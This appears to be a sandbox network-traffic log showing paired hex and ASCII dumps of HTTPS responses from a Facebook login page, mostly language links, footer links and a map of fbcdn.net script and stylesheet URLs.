                                                                                                                                                                                    2023-01-05 08:01:41 UTC20178INData Raw: 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 32 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 49 74 61 6c 69 61 6e 22 3e 49 74 61 6c 69 61 6e 6f 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 74 2d 70 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70
                                                                                                                                                                                    Data Ascii: 0252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="ltr" href="https://pt-pt.facebook.com/login.p
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20180INData Raw: 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 65 73 2d 6c 61 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 35 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 53 70 61 6e 69 73 68 22 3e 45 73 70 61 c3 b1 6f 6c 3c 2f 61
                                                                                                                                                                                    Data Ascii: &quot;https:\/\/es-la.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 5); return false;" title="Spanish">Espaol</a
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20181INData Raw: 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 68 69 5f 49 4e 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 68 69 2d 69 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74
                                                                                                                                                                                    Data Ascii: ;).setCookieLocale(&quot;hi_IN&quot;, &quot;en_US&quot;, &quot;https:\/\/hi-in.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_select
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20183INData Raw: 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 6f 67 69 6e 2f 22 20 74 69 74 6c 65 3d 22 4c 6f 67 20 69 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 22 3e 4c 6f 67 20 49 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 73 73 65 6e 67 65 72 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 4d 65 73 73 65 6e 67 65 72 2e 22 3e 4d 65 73 73 65 6e 67 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 69 74 65 2f 22 20 74 69 74 6c 65 3d 22 46 61 63 65 62 6f 6f 6b 20 4c 69 74 65 20 66 6f 72 20 41 6e 64 72 6f 69 64 2e 22 3e 46 61 63 65 62 6f 6f 6b 20 4c 69 74 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b
                                                                                                                                                                                    Data Ascii: ><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20184INData Raw: 69 3e 3c 61 20 68 72 65 66 3d 22 2f 76 6f 74 69 6e 67 69 6e 66 6f 72 6d 61 74 69 6f 6e 63 65 6e 74 65 72 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 63 32 6c 30 5a 51 25 33 44 25 33 44 22 20 74 69 74 6c 65 3d 22 53 65 65 20 74 68 65 20 56 6f 74 69 6e 67 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 43 65 6e 74 65 72 2e 22 3e 56 6f 74 69 6e 67 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 43 65 6e 74 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 72 69 76 61 63 79 2f 70 6f 6c 69 63 79 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 66 61 63 65 62 6f 6f 6b 5f 70 61 67 65 5f 66 6f 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 68 6f 77 20 77 65 20 63 6f 6c 6c 65 63 74 2c 20 75 73 65 20 61 6e 64 20 73 68 61 72 65 20 69 6e 66 6f 72 6d 61 74
                                                                                                                                                                                    Data Ascii: i><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn how we collect, use and share informat
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20186INData Raw: 22 20 61 63 63 65 73 73 6b 65 79 3d 22 39 22 20 74 69 74 6c 65 3d 22 52 65 76 69 65 77 20 6f 75 72 20 74 65 72 6d 73 20 61 6e 64 20 70 6f 6c 69 63 69 65 73 2e 22 3e 54 65 72 6d 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 68 65 6c 70 2f 3f 72 65 66 3d 70 66 22 20 61 63 63 65 73 73 6b 65 79 3d 22 30 22 20 74 69 74 6c 65 3d 22 56 69 73 69 74 20 6f 75 72 20 48 65 6c 70 20 43 65 6e 74 65 72 2e 22 3e 48 65 6c 70 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 65 6c 70 2f 36 33 37 32 30 35 30 32 30 38 37 38 35 30 34 22 20 74 69 74 6c 65 3d 22 56 69 73 69 74 20 6f 75 72 20 43 6f 6e 74 61 63 74 20 55 70 6c 6f 61 64 69 6e 67 20 26 61 6d 70 3b 20 4e 6f 6e 2d 55 73 65 72 73 20 4e 6f 74 69 63 65 2e 22 3e 43 6f 6e 74 61
                                                                                                                                                                                    Data Ascii: " accesskey="9" title="Review our terms and policies.">Terms</a></li><li><a href="/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></li><li><a href="help/637205020878504" title="Visit our Contact Uploading &amp; Non-Users Notice.">Conta
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20187INData Raw: 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 31 39 4c 73 65 49 47 31 6e 77 71 33 6f 30 46 6f 22 7d 2c 22 31 33 39 39 32 31 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 36 67 75 43 57 31 65 79 49 6b 4f 56 31 45 78 34 30 22 7d 2c 22 31 34 30 31 30 36 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 35 61 65 74 4e 35 47 62 33 72 65 49 58 56 44 5a 67 22 7d 2c 22 31 35 39 36 30 36 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 4a 48 75 44 57 74 61 4f 71 52 75 42 55 30 48 77 22 7d 2c 22 31 37 32 32 30 31 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 5f 4d 35 67 70 63 36 52 4c 72 48
                                                                                                                                                                                    Data Ascii: ult":false,"hash":"AT519LseIG1nwq3o0Fo"},"1399218":{"result":true,"hash":"AT6guCW1eyIkOV1Ex40"},"1401060":{"result":true,"hash":"AT5aetN5Gb3reIXVDZg"},"1596063":{"result":false,"hash":"AT7JHuDWtaOqRuBU0Hw"},"1722014":{"result":false,"hash":"AT6_M5gpc6RLrH
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20189INData Raw: 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 65 5c 2f 72 5c 2f 36 7a 6d 68 6d 62 6c 6c 70 57 77 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4d 37 5c 2f 6a 6c 43 52 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 46 5c 2f 72 5c 2f 50 74 6d 66 78 4c 56 77 41 62 37 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 74 74 58 70 77 70 52 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70
                                                                                                                                                                                    Data Ascii: :"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ye\/r\/6zmhmbllpWw.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"M7\/jlCR":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yF\/r\/PtmfxLVwAb7.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"ttXpwpR":{"type":"js","src":"http
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20190INData Raw: 22 64 47 65 62 33 7a 49 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 38 4a 46 34 5c 2f 79 36 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 4d 6e 42 39 33 66 31 5f 31 31 4e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 52 35 77 31 72 43 4a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 46 5c 2f 72 5c 2f 70 35 35 48 66 58 57 5f 5f 6d 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63
                                                                                                                                                                                    Data Ascii: "dGeb3zI":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i8JF4\/y6\/l\/en_US\/MnB93f1_11N.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"R5w1rCJ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yF\/r\/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz","nc
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20192INData Raw: 79 4a 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 6c 32 67 55 79 5f 6f 72 78 66 37 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 50 56 73 32 34 4e 41 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 41 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 74 43 6f 36 37 4a 6e 6f 68 34 73 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4f 4b 38 67 5c 2f 69 54 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74
                                                                                                                                                                                    Data Ascii: yJ\/l\/0,cross\/l2gUy_orxf7.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"PVs24NA":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yA\/l\/0,cross\/tCo67Jnoh4s.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"OK8g\/iT":{"type":"css","src":"https:\/\/static.xx.fbcdn.net
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20193INData Raw: 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 69 6c 38 2b 31 50 32 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 49 5c 2f 72 5c 2f 75 47 75 65 39 76 73 30 47 7a 54 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 45 7a 36 31 41 33 51 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 59 5c 2f 72 5c 2f 63 4d 2d 56 51 4d 30 77 75 39 78 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a
                                                                                                                                                                                    Data Ascii: p8lg5Kz","nc":1},"il8+1P2":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yI\/r\/uGue9vs0GzT.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Ez61A3Q":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yY\/r\/cM-VQM0wu9x.js?_nc_x=Ij3Wp8lg5Kz
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20195INData Raw: 6c 5c 2f 65 6e 5f 55 53 5c 2f 6d 4f 2d 54 69 31 38 5a 69 42 41 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 58 4a 55 6b 52 78 38 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 74 5c 2f 72 5c 2f 5f 39 5f 6b 67 4b 78 6d 44 73 4a 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 5a 6e 78 5a 56 41 63 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 69 5c
                                                                                                                                                                                    Data Ascii: l\/en_US\/mO-Ti18ZiBA.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"XJUkRx8":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yt\/r\/_9_kgKxmDsJ.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"ZnxZVAc":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yi\
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20196INData Raw: 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 6f 35 45 34 5c 2f 79 42 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 30 6d 4a 44 4f 57 49 43 6a 6a 36 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 2b 2b 57 65 7a 75 52 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 4c 33 69 34 5c 2f 79 5a 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 36 55 56 77 5a 4b 46 32 34 55 55 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 2b 41 6f 77 46
                                                                                                                                                                                    Data Ascii: "src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3io5E4\/yB\/l\/en_US\/0mJDOWICjj6.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"++WezuR":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iL3i4\/yZ\/l\/en_US\/6UVwZKF24UU.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"+AowF
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20197INData Raw: 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 6a 7a 51 34 5c 2f 79 77 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 33 45 34 71 35 73 55 64 6d 32 66 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 74 72 35 38 44 58 6c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 4a 32 73 4c 75 71 33 52 43 58 30 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 63 42 6e 6d 6b 35 31 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78
                                                                                                                                                                                    Data Ascii: dn.net\/rsrc.php\/v3ijzQ4\/yw\/l\/en_US\/3E4q5sUdm2f.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"tr58DXl":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/J2sLuq3RCX0.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"cBnmk51":{"type":"js","src":"https:\/\/static.x
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20199INData Raw: 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6a 6a 50 42 58 4b 6c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 55 5c 2f 72 5c 2f 4a 6c 71 6f 4f 75 54 6e 66 4e 6b 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 34 57 75 33 4b 42 51 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 79 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 75 65 4a 2d 77 49 77 72 69 76
                                                                                                                                                                                    Data Ascii: s?_nc_x=Ij3Wp8lg5Kz","nc":1},"jjPBXKl":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yU\/r\/JlqoOuTnfNk.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"4Wu3KBQ":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yy\/l\/0,cross\/ueJ-wIwriv
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20200INData Raw: 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 5a 5c 2f 72 5c 2f 74 56 73 68 70 31 4f 49 56 39 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 53 57 78 33 79 4e 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 37 5c 2f 72 5c 2f 67 5f 5f 65 56 35 4f 58 53 58 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6f 45 34 44 6f 66 54 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63
                                                                                                                                                                                    Data Ascii: .xx.fbcdn.net\/rsrc.php\/v3\/yZ\/r\/tVshp1OIV9l.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"SWx3yNv":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y7\/r\/g__eV5OXSXl.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"oE4DofT":{"type":"js","src":"https:\/\/static.xx.fbc
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20202INData Raw: 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 75 5a 6e 59 6e 6a 41 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 41 73 79 6e 63 52 65 71 75 65 73 74 22 3a 7b 22 72 22 3a 5b 22 66 42 4e 79 7a 64 34 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 53 67 44 30 47 31 71 22 2c 22 4f 52 66 46 36 77 70 22 2c 22 31 34 37 76 78 35 41 22 2c 22 65 33 64 79 57 61 46 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 22 72 22 3a 5b 22 75 5a 6e 59 6e 6a 41 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 44 4f 4d 22 3a 7b 22 72 22 3a 5b 22 66 42 4e 79 7a 64 34 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 65 33 64 79 57 61 46 22 5d 2c 22 62 65 22 3a 31
                                                                                                                                                                                    Data Ascii: anzaiScuba_DEPRECATED"],"r":["uZnYnjA"]},"be":1},"AsyncRequest":{"r":["fBNyzd4","+CEjbBy","SgD0G1q","ORfF6wp","147vx5A","e3dyWaF"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"],"r":["uZnYnjA"]},"be":1},"DOM":{"r":["fBNyzd4","+CEjbBy","e3dyWaF"],"be":1
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20203INData Raw: 59 46 22 2c 22 46 4a 76 47 4b 5c 2f 6a 22 2c 22 67 69 74 74 2b 6d 4b 22 2c 22 53 67 44 30 47 31 71 22 2c 22 55 46 62 4b 58 4a 4d 22 2c 22 76 70 74 55 4a 79 38 22 2c 22 33 6d 63 36 79 62 76 22 2c 22 50 75 64 36 42 32 5a 22 2c 22 70 49 30 59 6b 78 33 22 2c 22 6d 36 50 63 6c 49 51 22 2c 22 69 6c 38 2b 31 50 32 22 2c 22 64 76 78 49 54 75 6f 22 2c 22 67 63 44 34 4e 63 52 22 2c 22 45 7a 36 31 41 33 51 22 2c 22 53 5a 37 44 71 43 42 22 2c 22 6b 4f 45 48 76 70 75 22 2c 22 4f 52 66 46 36 77 70 22 2c 22 6d 4f 32 52 55 6f 47 22 2c 22 61 6d 6c 4b 4f 78 6b 22 2c 22 65 4d 6b 4d 78 48 5a 22 2c 22 75 79 4c 4c 74 59 63 22 2c 22 4d 37 5c 2f 6a 6c 43 52 22 2c 22 62 61 64 52 4b 71 42 22 2c 22 31 64 36 35 55 32 6f 22 2c 22 43 47 6b 48 34 46 59 22 2c 22 4a 32 61 39 45 70 5c 2f
                                                                                                                                                                                    Data Ascii: YF","FJvGK\/j","gitt+mK","SgD0G1q","UFbKXJM","vptUJy8","3mc6ybv","Pud6B2Z","pI0Ykx3","m6PclIQ","il8+1P2","dvxITuo","gcD4NcR","Ez61A3Q","SZ7DqCB","kOEHvpu","ORfF6wp","mO2RUoG","amlKOxk","eMkMxHZ","uyLLtYc","M7\/jlCR","badRKqB","1d65U2o","CGkH4FY","J2a9Ep\/
